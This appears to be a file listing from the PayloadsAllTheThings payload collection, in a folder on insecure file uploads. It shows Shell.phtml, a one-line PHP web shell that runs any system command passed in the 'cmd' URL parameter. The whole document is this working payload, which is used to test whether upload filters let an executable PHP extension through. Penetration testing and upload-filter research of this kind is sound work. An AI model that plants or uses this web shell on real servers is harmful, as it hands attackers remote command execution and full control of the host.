PayloadsAllTheThings/Upload insecure files/PHP Extension/Shell.phtml

1 line
No EOL
43 B
PHTML
Executable file

<?php echo "Shell";system($_GET['cmd']); ?>